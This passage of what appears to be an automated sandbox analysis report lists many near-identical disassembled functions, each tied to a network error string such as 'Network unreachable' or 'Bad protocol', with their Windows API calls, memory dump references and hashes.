                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$strncpy
                                      • String ID: Network unreachable
                                      • API String ID: 4135170618-3916218534
                                      • Opcode ID: 1b2f63783f7f4d7d40b0cd45d0fdc32aaf6d288aacb99f12aa01e653bada01e5
                                      • Instruction ID: 335d0cf8258b3c40518a9235c1bd9c33e83957b00a220abb94e67a0d781a9b3f
                                      • Opcode Fuzzy Hash: 1b2f63783f7f4d7d40b0cd45d0fdc32aaf6d288aacb99f12aa01e653bada01e5
                                      • Instruction Fuzzy Hash: 90F01725A0DA4686E740BF61A504129F321FF5CB95F880071DA6E03BD4CF3DE888A7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$strncpy
                                      • String ID: Network has been reset
                                      • API String ID: 4135170618-381532975
                                      • Opcode ID: 8f3fa12307631ec0f5d64785a52070851fb09c23c018ce077d4f3d167a2a1246
                                      • Instruction ID: cfbe0ad9bb3b73dbe08a80cf5bb2f3b1c754face647302ced5cd5795f685d0e4
                                      • Opcode Fuzzy Hash: 8f3fa12307631ec0f5d64785a52070851fb09c23c018ce077d4f3d167a2a1246
                                      • Instruction Fuzzy Hash: A6F01D25A0DA4696E740AF65A504129F321FF5CB95FC80071DA6E03BD4CF3DE888E7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$strncpy
                                      • String ID: Address already in use
                                      • API String ID: 4135170618-3458345520
                                      • Opcode ID: 0c4f1c0208c1057575a4d0e70bd10916dde76a9c710129c71fbd92d90181d68d
                                      • Instruction ID: 33fefa66fdb3fbf4fcd15856e55f4460b83161754fac211287627206c2ad06d0
                                      • Opcode Fuzzy Hash: 0c4f1c0208c1057575a4d0e70bd10916dde76a9c710129c71fbd92d90181d68d
                                      • Instruction Fuzzy Hash: 11F01D25A0DA4696E740AF61A504129F321FF5CB95F880071DA6E03BD4CF3DE888E7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$strncpy
                                      • String ID: Address not available
                                      • API String ID: 4135170618-1121827788
                                      • Opcode ID: 238a3fc0d2b3d220cda6aee35ddb82b25b0056b7a7a5e4e0b0d9cf77d73a4aa9
                                      • Instruction ID: 4c2abc6726fcc477c3734e016ccbb2a183bb1ee01ff7a564e6fe88df3f39f28c
                                      • Opcode Fuzzy Hash: 238a3fc0d2b3d220cda6aee35ddb82b25b0056b7a7a5e4e0b0d9cf77d73a4aa9
                                      • Instruction Fuzzy Hash: FDF01D25A0DA4686E740AF61A50412DF721FF5CB95F880071DA6E03BD4CF3DE849A7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$strncpy
                                      • String ID: Network down
                                      • API String ID: 4135170618-68288426
                                      • Opcode ID: 59c06a2025fa57dbfa701fd055f4d87c914c2a221ac81713ea469171c895b8c2
                                      • Instruction ID: 2ddd50e8dce5cb562098cd05dff78ba3b6d1cc0d75e58d32a5bcdae526506359
                                      • Opcode Fuzzy Hash: 59c06a2025fa57dbfa701fd055f4d87c914c2a221ac81713ea469171c895b8c2
                                      • Instruction Fuzzy Hash: 66F01725A0DA4686E740AF61A504129F321FF5CB95F880071DA6E03BD4CF3DE888A7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$strncpy
                                      • String ID: Operation not supported
                                      • API String ID: 4135170618-107827863
                                      • Opcode ID: a5d2e8d1821e0ee5fae2c56a496104cdda358f16f25be16ef14b288cb63d7c4a
                                      • Instruction ID: 69f4a0c1cb043f38d8c7be41b88fb86f9c3789f75b3d349d127e4352a105068f
                                      • Opcode Fuzzy Hash: a5d2e8d1821e0ee5fae2c56a496104cdda358f16f25be16ef14b288cb63d7c4a
                                      • Instruction Fuzzy Hash: 13F01D25A0DA4686E740AF61A50412DF321FF5CB95F880071DA6E03BD4CF3DE848A7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$strncpy
                                      • String ID: Address family not supported
                                      • API String ID: 4135170618-3092539563
                                      • Opcode ID: 097a147bdd45383524443a1f87e4d92a3841d1b397de2f6815b00343d085fe05
                                      • Instruction ID: 64e2ae458215a9e6bb7c880d50d93f033dd6c7d4e62b20dfd6ee1a105debe527
                                      • Opcode Fuzzy Hash: 097a147bdd45383524443a1f87e4d92a3841d1b397de2f6815b00343d085fe05
                                      • Instruction Fuzzy Hash: 80F01D25A0DA4686E740AF61A504129F321FF5CB95F880071DA6E03BD4CF3DE888E7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$strncpy
                                      • String ID: Protocol family not supported
                                      • API String ID: 4135170618-3651057236
                                      • Opcode ID: 9ef8ad2a5574b306d4c07514ab9881952d263a0973bdee9d4f5d2fd88efe740f
                                      • Instruction ID: a3bf47fe0697abea7b93acd15355222b8afca41c1ab2a584063f46c819e5c17b
                                      • Opcode Fuzzy Hash: 9ef8ad2a5574b306d4c07514ab9881952d263a0973bdee9d4f5d2fd88efe740f
                                      • Instruction Fuzzy Hash: E0F01725A0DA4686E740AF61A504129F321FF5CB95F880071DA6E03BD4CF3DE888A7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$strncpy
                                      • String ID: Protocol is unsupported
                                      • API String ID: 4135170618-4145053010
                                      • Opcode ID: 42a2aa605b2b27548365df711ea50b2d0268f65a8af4025c3be454995e14b9cb
                                      • Instruction ID: 16fcafb872b1f492d2b4056e58b7c065f839bed4dfc7ffe936134d9e2695aa6b
                                      • Opcode Fuzzy Hash: 42a2aa605b2b27548365df711ea50b2d0268f65a8af4025c3be454995e14b9cb
                                      • Instruction Fuzzy Hash: D5F01D25A0DA4686E740AF61A50412DF321FF5CB95F880071DA6E13BD4CF3DE848A7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$strncpy
                                      • String ID: Socket is unsupported
                                      • API String ID: 4135170618-1818884963
                                      • Opcode ID: c342ca95e42bf927b678b3848897e671715324e6f00bef1214f527418c0be7c4
                                      • Instruction ID: b34db74cba8d9e3e3a758815af8856118d823af9d5d6248d23557201b42fd749
                                      • Opcode Fuzzy Hash: c342ca95e42bf927b678b3848897e671715324e6f00bef1214f527418c0be7c4
                                      • Instruction Fuzzy Hash: 16F01725A0DA4686E740AF61A504129F321FF5CBD5F880071DA6E03BD4CF3DE888A7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$strncpy
                                      • String ID: Bad message size
                                      • API String ID: 4135170618-3333243842
                                      • Opcode ID: 7d7bade0ea4956d7ebf532a0647fef93faaed68fff1d1590ba2f9ca39a7e82ab
                                      • Instruction ID: 7215184f74c11945967ae9f2d33e0a7bd063a8b0cc690c4ca8aefa7ba11f1d87
                                      • Opcode Fuzzy Hash: 7d7bade0ea4956d7ebf532a0647fef93faaed68fff1d1590ba2f9ca39a7e82ab
                                      • Instruction Fuzzy Hash: FAF01D25A0DA4686E740AF61A504129F321FF5CB95F880071DA6E03BD4CF3DE888A7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$strncpy
                                      • String ID: Bad protocol
                                      • API String ID: 4135170618-3251168116
                                      • Opcode ID: 7a85d6a2444bd8c35f1df986206a8430a2c1e422b70908fab0cf8e139006da45
                                      • Instruction ID: 8cb863b092303cb1eecb7b853ccdfd2fcaed5cebc1bbcec2c3f0cc5dfae5465d
                                      • Opcode Fuzzy Hash: 7a85d6a2444bd8c35f1df986206a8430a2c1e422b70908fab0cf8e139006da45
                                      • Instruction Fuzzy Hash: 80F01725A0DA4686E740AF61A504129F321FF5CB95F880071DA6E03BD4CF3DE888A7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
